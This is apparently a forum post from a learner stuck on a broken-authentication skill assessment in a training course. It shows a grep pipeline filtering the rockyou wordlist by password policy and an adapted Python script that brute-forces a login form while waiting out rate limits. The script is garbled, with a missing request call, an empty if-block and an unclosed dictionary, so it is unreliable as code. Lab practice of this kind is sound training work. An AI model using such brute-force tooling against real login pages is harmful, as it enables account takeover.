Skill Assessment - Broken Authentication

Hi guys, I’m having extreme difficulty completing the skill assessment, I’ll mention what I’ve already done.

  • Discover 10 users being support.XX and admin.XX
  • I performed a filter with rockyou’s password policies with the following command:
grep '^[[:upper:]]' /usr/share/wordlists/rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]$' | grep '[[:punct:]]' | grep -E '^.{20,}$'

I adapted rate_limit_check_py to see if I could get a valid password for a user, but so far nothing. I’ve already tried brute force via ffuf, wfuzz, hydra. I’ve been stuck on this for a long time, could anyone help me? I’ll leave the adapted script below:

# file that contain user:pass
userpass_file = "wordlistsecond.txt"
userlist_file = "userlist.txt"

# create url using user and password as airgument
url = ""

# rate limit blocks for 30 seconds
lock_time = 31

# message that alert us we hit rate limit
lock_message = "Too many failures"

# read user and password
while True:
    with open(userpass_file,"r") as fp:
        for plinha in fp:
            if plinha.startswith("#"):

            with open(userlist_file,"r") as fu:
                for ulinha in fu:
                    data = {
                        "userid": ulinha,
                        "passwd": plinha,
                        "submit": "submit",
                        "remember": "remember"
                    res =, data=data)

                    if "Invalid credentials" in res.text:
                        print("[-] Invalid credentials: userid:{} passwd:{}".format(ulinha,plinha))
                    elif "Messages" in res.text:
                        print("[++++++++++++++++++++] Valid credentials: userid:{} passwd:{}".format(ulinha,plinha))
                    elif lock_message in res.text:
                        print("[-] Hit rate limiti, sleeping 30s")

I literally just need to resolve this to end the bug bounty path

I resolved it, the regex are wrong, than all password filtered by it are too wrong. If someone need help to resolve this module, feel free to send a message on my private.